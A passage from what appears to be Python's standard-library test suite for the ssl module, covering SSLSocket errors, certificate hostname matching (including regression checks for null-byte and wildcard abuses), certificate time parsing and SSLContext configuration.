        # Methods on an unconnected SSLSocket propagate the original
        # OSError raised by the underlying socket object.
        s = socket.socket(socket.AF_INET)
        with ssl.wrap_socket(s) as ss:
            self.assertRaises(OSError, ss.recv, 1)
            self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
            self.assertRaises(OSError, ss.recvfrom, 1)
            self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
            self.assertRaises(OSError, ss.send, b'x')
            self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))

    def test_timeout(self):
        # Issue #8524: when creating an SSL socket, the timeout of the
        # original socket should be retained.
        for timeout in (None, 0.0, 5.0):
            s = socket.socket(socket.AF_INET)
            s.settimeout(timeout)
            with ssl.wrap_socket(s) as ss:
                self.assertEqual(timeout, ss.gettimeout())

    def test_errors(self):
        sock = socket.socket()
        self.assertRaisesRegex(ValueError,
                               "certfile must be specified",
                               ssl.wrap_socket, sock, keyfile=CERTFILE)
        self.assertRaisesRegex(ValueError,
                               "certfile must be specified for server-side operations",
                               ssl.wrap_socket, sock, server_side=True)
        self.assertRaisesRegex(ValueError,
                               "certfile must be specified for server-side operations",
                               ssl.wrap_socket, sock, server_side=True, certfile="")
        with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
            self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
                                   s.connect, (HOST, 8080))
        with self.assertRaises(OSError) as cm:
            with socket.socket() as sock:
                ssl.wrap_socket(sock, certfile=WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(OSError) as cm:
            with socket.socket() as sock:
                ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(OSError) as cm:
            with socket.socket() as sock:
                ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)

    def test_match_hostname(self):
        def ok(cert, hostname):
            ssl.match_hostname(cert, hostname)
        def fail(cert, hostname):
            self.assertRaises(ssl.CertificateError,
                              ssl.match_hostname, cert, hostname)

        # -- Hostname matching --

        cert = {'subject': ((('commonName', 'example.com'),),)}
        ok(cert, 'example.com')
        ok(cert, 'ExAmple.cOm')
        fail(cert, 'www.example.com')
        fail(cert, '.example.com')
        fail(cert, 'example.org')
        fail(cert, 'exampleXcom')

        cert = {'subject': ((('commonName', '*.a.com'),),)}
        ok(cert, 'foo.a.com')
        fail(cert, 'bar.foo.a.com')
        fail(cert, 'a.com')
        fail(cert, 'Xa.com')
        fail(cert, '.a.com')

        # only match one left-most wildcard
        cert = {'subject': ((('commonName', 'f*.com'),),)}
        ok(cert, 'foo.com')
        ok(cert, 'f.com')
        fail(cert, 'bar.com')
        fail(cert, 'foo.a.com')
        fail(cert, 'bar.foo.com')

        # NULL bytes are bad, CVE-2013-4073
        cert = {'subject': ((('commonName',
                              'null.python.org\x00example.org'),),)}
        ok(cert, 'null.python.org\x00example.org') # or raise an error?
        fail(cert, 'example.org')
        fail(cert, 'null.python.org')

        # error cases with wildcards
        cert = {'subject': ((('commonName', '*.*.a.com'),),)}
        fail(cert, 'bar.foo.a.com')
        fail(cert, 'a.com')
        fail(cert, 'Xa.com')
        fail(cert, '.a.com')

        cert = {'subject': ((('commonName', 'a.*.com'),),)}
        fail(cert, 'a.foo.com')
        fail(cert, 'a..com')
        fail(cert, 'a.com')

        # wildcard doesn't match IDNA prefix 'xn--'
        idna = 'püthon.python.org'.encode("idna").decode("ascii")
        cert = {'subject': ((('commonName', idna),),)}
        ok(cert, idna)
        cert = {'subject': ((('commonName', 'x*.python.org'),),)}
        fail(cert, idna)
        cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
        fail(cert, idna)

        # wildcard in first fragment and  IDNA A-labels in sequent fragments
        # are supported.
        idna = 'www*.pythön.org'.encode("idna").decode("ascii")
        cert = {'subject': ((('commonName', idna),),)}
        ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
        ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
        fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
        fail(cert, 'pythön.org'.encode("idna").decode("ascii"))

        # Slightly fake real-world example
        cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
                'subject': ((('commonName', 'linuxfrz.org'),),),
                'subjectAltName': (('DNS', 'linuxfr.org'),
                                   ('DNS', 'linuxfr.com'),
                                   ('othername', '<unsupported>'))}
        ok(cert, 'linuxfr.org')
        ok(cert, 'linuxfr.com')
        # Not a "DNS" entry
        fail(cert, '<unsupported>')
        # When there is a subjectAltName, commonName isn't used
        fail(cert, 'linuxfrz.org')

        # A pristine real-world example
        cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),),
                            (('commonName', 'mail.google.com'),))}
        ok(cert, 'mail.google.com')
        fail(cert, 'gmail.com')
        # Only commonName is considered
        fail(cert, 'California')

        # -- IPv4 matching --
        cert = {'subject': ((('commonName', 'example.com'),),),
                'subjectAltName': (('DNS', 'example.com'),
                                   ('IP Address', '10.11.12.13'),
                                   ('IP Address', '14.15.16.17'))}
        ok(cert, '10.11.12.13')
        ok(cert, '14.15.16.17')
        fail(cert, '14.15.16.18')
        fail(cert, 'example.net')

        # -- IPv6 matching --
        cert = {'subject': ((('commonName', 'example.com'),),),
                'subjectAltName': (('DNS', 'example.com'),
                                   ('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
                                   ('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
        ok(cert, '2001::cafe')
        ok(cert, '2003::baba')
        fail(cert, '2003::bebe')
        fail(cert, 'example.net')

        # -- Miscellaneous --

        # Neither commonName nor subjectAltName
        cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),))}
        fail(cert, 'mail.google.com')

        # No DNS entry in subjectAltName but a commonName
        cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('commonName', 'mail.google.com'),)),
                'subjectAltName': (('othername', 'blabla'), )}
        ok(cert, 'mail.google.com')

        # No DNS entry subjectAltName and no commonName
        cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),)),
                'subjectAltName': (('othername', 'blabla'),)}
        fail(cert, 'google.com')

        # Empty cert / no cert
        self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
        self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')

        # Issue #17980: avoid denials of service by refusing more than one
        # wildcard per fragment.
        cert = {'subject': ((('commonName', 'a*b.com'),),)}
        ok(cert, 'axxb.com')
        cert = {'subject': ((('commonName', 'a*b.co*'),),)}
        fail(cert, 'axxb.com')
        cert = {'subject': ((('commonName', 'a*b*.com'),),)}
        with self.assertRaises(ssl.CertificateError) as cm:
            ssl.match_hostname(cert, 'axxbxxc.com')
        self.assertIn("too many wildcards", str(cm.exception))

    def test_server_side(self):
        # server_hostname doesn't work for server sockets
        ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        with socket.socket() as sock:
            self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
                              server_hostname="some.hostname")

    def test_unknown_channel_binding(self):
        # should raise ValueError for unknown type
        s = socket.socket(socket.AF_INET)
        s.bind(('127.0.0.1', 0))
        s.listen()
        c = socket.socket(socket.AF_INET)
        c.connect(s.getsockname())
        with ssl.wrap_socket(c, do_handshake_on_connect=False) as ss:
            with self.assertRaises(ValueError):
                ss.get_channel_binding("unknown-type")
        s.close()

    @unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
                         "'tls-unique' channel binding not available")
    def test_tls_unique_channel_binding(self):
        # unconnected should return None for known type
        s = socket.socket(socket.AF_INET)
        with ssl.wrap_socket(s) as ss:
            self.assertIsNone(ss.get_channel_binding("tls-unique"))
        # the same for server-side
        s = socket.socket(socket.AF_INET)
        with ssl.wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
            self.assertIsNone(ss.get_channel_binding("tls-unique"))

    def test_dealloc_warn(self):
        ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
        r = repr(ss)
        with self.assertWarns(ResourceWarning) as cm:
            ss = None
            support.gc_collect()
        self.assertIn(r, str(cm.warning.args[0]))

    def test_get_default_verify_paths(self):
        paths = ssl.get_default_verify_paths()
        self.assertEqual(len(paths), 6)
        self.assertIsInstance(paths, ssl.DefaultVerifyPaths)

        with support.EnvironmentVarGuard() as env:
            env["SSL_CERT_DIR"] = CAPATH
            env["SSL_CERT_FILE"] = CERTFILE
            paths = ssl.get_default_verify_paths()
            self.assertEqual(paths.cafile, CERTFILE)
            self.assertEqual(paths.capath, CAPATH)

    @unittest.skipUnless(sys.platform == "win32", "Windows specific")
    def test_enum_certificates(self):
        self.assertTrue(ssl.enum_certificates("CA"))
        self.assertTrue(ssl.enum_certificates("ROOT"))

        self.assertRaises(TypeError, ssl.enum_certificates)
        self.assertRaises(WindowsError, ssl.enum_certificates, "")

        trust_oids = set()
        for storename in ("CA", "ROOT"):
            store = ssl.enum_certificates(storename)
            self.assertIsInstance(store, list)
            for element in store:
                self.assertIsInstance(element, tuple)
                self.assertEqual(len(element), 3)
                cert, enc, trust = element
                self.assertIsInstance(cert, bytes)
                self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
                self.assertIsInstance(trust, (set, bool))
                if isinstance(trust, set):
                    trust_oids.update(trust)

        serverAuth = "1.3.6.1.5.5.7.3.1"
        self.assertIn(serverAuth, trust_oids)

    @unittest.skipUnless(sys.platform == "win32", "Windows specific")
    def test_enum_crls(self):
        self.assertTrue(ssl.enum_crls("CA"))
        self.assertRaises(TypeError, ssl.enum_crls)
        self.assertRaises(WindowsError, ssl.enum_crls, "")

        crls = ssl.enum_crls("CA")
        self.assertIsInstance(crls, list)
        for element in crls:
            self.assertIsInstance(element, tuple)
            self.assertEqual(len(element), 2)
            self.assertIsInstance(element[0], bytes)
            self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})

    def test_asn1object(self):
        expected = (129, 'serverAuth', 'TLS Web Server Authentication',
                    '1.3.6.1.5.5.7.3.1')

        val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
        self.assertEqual(val, expected)
        self.assertEqual(val.nid, 129)
        self.assertEqual(val.shortname, 'serverAuth')
        self.assertEqual(val.longname, 'TLS Web Server Authentication')
        self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
        self.assertIsInstance(val, ssl._ASN1Object)
        self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')

        val = ssl._ASN1Object.fromnid(129)
        self.assertEqual(val, expected)
        self.assertIsInstance(val, ssl._ASN1Object)
        self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
        with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
            ssl._ASN1Object.fromnid(100000)
        for i in range(1000):
            try:
                obj = ssl._ASN1Object.fromnid(i)
            except ValueError:
                pass
            else:
                self.assertIsInstance(obj.nid, int)
                self.assertIsInstance(obj.shortname, str)
                self.assertIsInstance(obj.longname, str)
                self.assertIsInstance(obj.oid, (str, type(None)))

        val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
        self.assertEqual(val, expected)
        self.assertIsInstance(val, ssl._ASN1Object)
        self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
        self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
                         expected)
        with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
            ssl._ASN1Object.fromname('serverauth')

    def test_purpose_enum(self):
        val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
        self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
        self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
        self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
        self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
        self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
                         '1.3.6.1.5.5.7.3.1')

        val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
        self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
        self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
        self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
        self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
        self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
                         '1.3.6.1.5.5.7.3.2')

    def test_unsupported_dtls(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.addCleanup(s.close)
        with self.assertRaises(NotImplementedError) as cx:
            ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
        self.assertEqual(str(cx.exception), "only stream sockets are supported")
        ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        with self.assertRaises(NotImplementedError) as cx:
            ctx.wrap_socket(s)
        self.assertEqual(str(cx.exception), "only stream sockets are supported")

    def cert_time_ok(self, timestring, timestamp):
        # Helper: *timestring* must parse to exactly *timestamp*.
        self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)

    def cert_time_fail(self, timestring):
        # Helper: *timestring* must be rejected with ValueError.
        with self.assertRaises(ValueError):
            ssl.cert_time_to_seconds(timestring)

    @unittest.skipUnless(utc_offset(),
                         'local time needs to be different from UTC')
    def test_cert_time_to_seconds_timezone(self):
        # Issue #19940: ssl.cert_time_to_seconds() returns wrong
        #               results if local timezone is not UTC
        self.cert_time_ok("May  9 00:00:00 2007 GMT", 1178668800.0)
        self.cert_time_ok("Jan  5 09:34:43 2018 GMT", 1515144883.0)

    def test_cert_time_to_seconds(self):
        timestring = "Jan  5 09:34:43 2018 GMT"
        ts = 1515144883.0
        self.cert_time_ok(timestring, ts)
        # accept keyword parameter, assert its name
        self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
        # accept both %e and %d (space or zero generated by strftime)
        self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
        # case-insensitive
        self.cert_time_ok("JaN  5 09:34:43 2018 GmT", ts)
        self.cert_time_fail("Jan  5 09:34 2018 GMT")     # no seconds
        self.cert_time_fail("Jan  5 09:34:43 2018")      # no GMT
        self.cert_time_fail("Jan  5 09:34:43 2018 UTC")  # not GMT timezone
        self.cert_time_fail("Jan 35 09:34:43 2018 GMT")  # invalid day
        self.cert_time_fail("Jon  5 09:34:43 2018 GMT")  # invalid month
        self.cert_time_fail("Jan  5 24:00:00 2018 GMT")  # invalid hour
        self.cert_time_fail("Jan  5 09:60:43 2018 GMT")  # invalid minute

        newyear_ts = 1230768000.0
        # leap seconds
        self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
        # same timestamp
        self.cert_time_ok("Jan  1 00:00:00 2009 GMT", newyear_ts)

        self.cert_time_ok("Jan  5 09:34:59 2018 GMT", 1515144899)
        #  allow 60th second (even if it is not a leap second)
        self.cert_time_ok("Jan  5 09:34:60 2018 GMT", 1515144900)
        #  allow 2nd leap second for compatibility with time.strptime()
        self.cert_time_ok("Jan  5 09:34:61 2018 GMT", 1515144901)
        self.cert_time_fail("Jan  5 09:34:62 2018 GMT")  # invalid seconds

        # no special treatement for the special value:
        #   99991231235959Z (rfc 5280)
        self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)

    @support.run_with_locale('LC_ALL', '')
    def test_cert_time_to_seconds_locale(self):
        # `cert_time_to_seconds()` should be locale independent

        def local_february_name():
            return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))

        if local_february_name().lower() == 'feb':
            self.skipTest("locale-specific month name needs to be "
                          "different from C locale")

        # locale-independent
        self.cert_time_ok("Feb  9 00:00:00 2007 GMT", 1170979200.0)
        self.cert_time_fail(local_february_name() + "  9 00:00:00 2007 GMT")
class ContextTests(unittest.TestCase):
    """Tests for the ssl.SSLContext API (no network connections)."""

    @skip_if_broken_ubuntu_ssl
    def test_constructor(self):
        for protocol in PROTOCOLS:
            ssl.SSLContext(protocol)
        self.assertRaises(TypeError, ssl.SSLContext)
        self.assertRaises(ValueError, ssl.SSLContext, -1)
        self.assertRaises(ValueError, ssl.SSLContext, 42)

    @skip_if_broken_ubuntu_ssl
    def test_protocol(self):
        for proto in PROTOCOLS:
            ctx = ssl.SSLContext(proto)
            self.assertEqual(ctx.protocol, proto)

    def test_ciphers(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.set_ciphers("ALL")
        ctx.set_ciphers("DEFAULT")
        with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
            ctx.set_ciphers("^$:,;?*'dorothyx")

    @skip_if_broken_ubuntu_ssl
    def test_options(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # OP_ALL | OP_NO_SSLv2 is the default value
        self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2,
                         ctx.options)
        ctx.options |= ssl.OP_NO_SSLv3
        self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
                         ctx.options)
        if can_clear_options():
            ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
            self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
                             ctx.options)
            ctx.options = 0
            self.assertEqual(0, ctx.options)
        else:
            with self.assertRaises(ValueError):
                ctx.options = 0

    def test_verify_mode(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # Default value
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        ctx.verify_mode = ssl.CERT_OPTIONAL
        self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
        ctx.verify_mode = ssl.CERT_REQUIRED
        self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
        ctx.verify_mode = ssl.CERT_NONE
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        with self.assertRaises(TypeError):
            ctx.verify_mode = None
        with self.assertRaises(ValueError):
            ctx.verify_mode = 42

    @unittest.skipUnless(have_verify_flags(),
                         "verify_flags need OpenSSL > 0.9.8")
    def test_verify_flags(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # default value
        tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
        ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
        ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
        ctx.verify_flags = ssl.VERIFY_DEFAULT
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
        # supports any value
        ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
        self.assertEqual(ctx.verify_flags,
                         ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
        with self.assertRaises(TypeError):
            ctx.verify_flags = None

    def test_load_cert_chain(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # Combined key and cert in a single file
        ctx.load_cert_chain(CERTFILE, keyfile=None)
        ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
        self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
        with self.assertRaises(OSError) as cm:
            ctx.load_cert_chain(WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(BADCERT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(EMPTYCERT)
        # Separate key and cert
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_cert_chain(ONLYCERT, ONLYKEY)
        ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
        ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(ONLYCERT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(ONLYKEY)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
        # Mismatching key and cert
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
            ctx.load_cert_chain(SVN_PYTHON_ORG_ROOT_CERT, ONLYKEY)
        # Password protected key and cert
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
        ctx.load_cert_chain(CERTFILE_PROTECTED,
                            password=bytearray(KEY_PASSWORD.encode()))
        ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
        ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
        ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
                            bytearray(KEY_PASSWORD.encode()))
        with self.assertRaisesRegex(TypeError, "should be a string"):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
        with self.assertRaises(ssl.SSLError):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
        with self.assertRaisesRegex(ValueError, "cannot be longer"):
            # openssl has a fixed limit on the password buffer.
            # PEM_BUFSIZE is generally set to 1kb.
            # Return a string larger than this.
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
        # Password callback
        def getpass_unicode():
            return KEY_PASSWORD
        def getpass_bytes():
            return KEY_PASSWORD.encode()
        def getpass_bytearray():
            return bytearray(KEY_PASSWORD.encode())
        def getpass_badpass():
            return "badpass"
        def getpass_huge():
            return b'a' * (1024 * 1024)
        def getpass_bad_type():
            return 9
        def getpass_exception():
            raise Exception('getpass error')
        class GetPassCallable:
            def __call__(self):
                return KEY_PASSWORD
            def getpass(self):
                return KEY_PASSWORD
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
        ctx.load_cert_chain(CERTFILE_PROTECTED,
                            password=GetPassCallable().getpass)
        with self.assertRaises(ssl.SSLError):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
        with self.assertRaisesRegex(ValueError, "cannot be longer"):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
        with self.assertRaisesRegex(TypeError, "must return a string"):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
        with self.assertRaisesRegex(Exception, "getpass error"):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
        # Make sure the password function isn't called if it isn't needed
        ctx.load_cert_chain(CERTFILE, password=getpass_exception)

    def test_load_verify_locations(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_verify_locations(CERTFILE)
        ctx.load_verify_locations(cafile=CERTFILE, capath=None)
        ctx.load_verify_locations(BYTES_CERTFILE)
        ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
        self.assertRaises(TypeError, ctx.load_verify_locations)
        self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
        with self.assertRaises(OSError) as cm:
            ctx.load_verify_locations(WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_verify_locations(BADCERT)
        ctx.load_verify_locations(CERTFILE, CAPATH)
        ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)

        # Issue #10989: crash if the second argument type is invalid
        self.assertRaises(TypeError, ctx.load_verify_locations, None, True)

    def test_load_verify_cadata(self):
        # test cadata
        with open(CAFILE_CACERT) as f:
            cacert_pem = f.read()
        cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)

        with open(CAFILE_NEURONIO) as f:
            neuronio_pem = f.read()
        neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)

        # test PEM
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
        ctx.load_verify_locations(cadata=cacert_pem)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
        ctx.load_verify_locations(cadata=neuronio_pem)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # cert already in hash table
        ctx.load_verify_locations(cadata=neuronio_pem)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)

        # combined
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        combined = "\n".join((cacert_pem, neuronio_pem))
        ctx.load_verify_locations(cadata=combined)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)

        # with junk around the certs
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        combined = ["head", cacert_pem, "other", neuronio_pem, "again",
                    neuronio_pem, "tail"]
        ctx.load_verify_locations(cadata="\n".join(combined))
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)

        # test DER
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_verify_locations(cadata=cacert_der)
        ctx.load_verify_locations(cadata=neuronio_der)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # cert already in hash table
        ctx.load_verify_locations(cadata=cacert_der)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)

        # combined
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        combined = b"".join((cacert_der, neuronio_der))
        ctx.load_verify_locations(cadata=combined)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)

        # error cases
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)

        with self.assertRaisesRegex(ssl.SSLError, "no start line"):
            ctx.load_verify_locations(cadata="broken")
        with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
            ctx.load_verify_locations(cadata=b"broken")

    def test_load_dh_params(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_dh_params(DHFILE)
        if os.name != 'nt':
            ctx.load_dh_params(BYTES_DHFILE)
        self.assertRaises(TypeError, ctx.load_dh_params)
        self.assertRaises(TypeError, ctx.load_dh_params, None)
        with self.assertRaises(FileNotFoundError) as cm:
            ctx.load_dh_params(WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(ssl.SSLError) as cm:
            ctx.load_dh_params(CERTFILE)

    @skip_if_broken_ubuntu_ssl
    def test_session_stats(self):
        for proto in PROTOCOLS:
            ctx = ssl.SSLContext(proto)
            self.assertEqual(ctx.session_stats(), {
                'number': 0,
                'connect': 0,
                'connect_good': 0,
                'connect_renegotiate': 0,
                'accept': 0,
                'accept_good': 0,
                'accept_renegotiate': 0,
                'hits': 0,
                'misses': 0,
                'timeouts': 0,
                'cache_full': 0,
            })

    def test_set_default_verify_paths(self):
        # There's not much we can do to test that it acts as expected,
        # so just check it doesn't crash or raise an exception.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.set_default_verify_paths()

    @unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
    def test_set_ecdh_curve(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.set_ecdh_curve("prime256v1")
        ctx.set_ecdh_curve(b"prime256v1")
        self.assertRaises(TypeError, ctx.set_ecdh_curve)
        self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
        self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
        self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")

    @needs_sni
    def test_sni_callback(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)

        # set_servername_callback expects a callable, or None
        self.assertRaises(TypeError, ctx.set_servername_callback)
        self.assertRaises(TypeError, ctx.set_servername_callback, 4)
        self.assertRaises(TypeError, ctx.set_servername_callback, "")
        self.assertRaises(TypeError, ctx.set_servername_callback, ctx)

        def dummycallback(sock, servername, ctx):
            pass
        ctx.set_servername_callback(None)
        ctx.set_servername_callback(dummycallback)

    @needs_sni
    def test_sni_callback_refcycle(self):
        # Reference cycles through the servername callback are detected
        # and cleared.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        def dummycallback(sock, servername, ctx, cycle=ctx):
            pass
        ctx.set_servername_callback(dummycallback)
        wr = weakref.ref(ctx)
        del ctx, dummycallback
        gc.collect()
        self.assertIs(wr(), None)

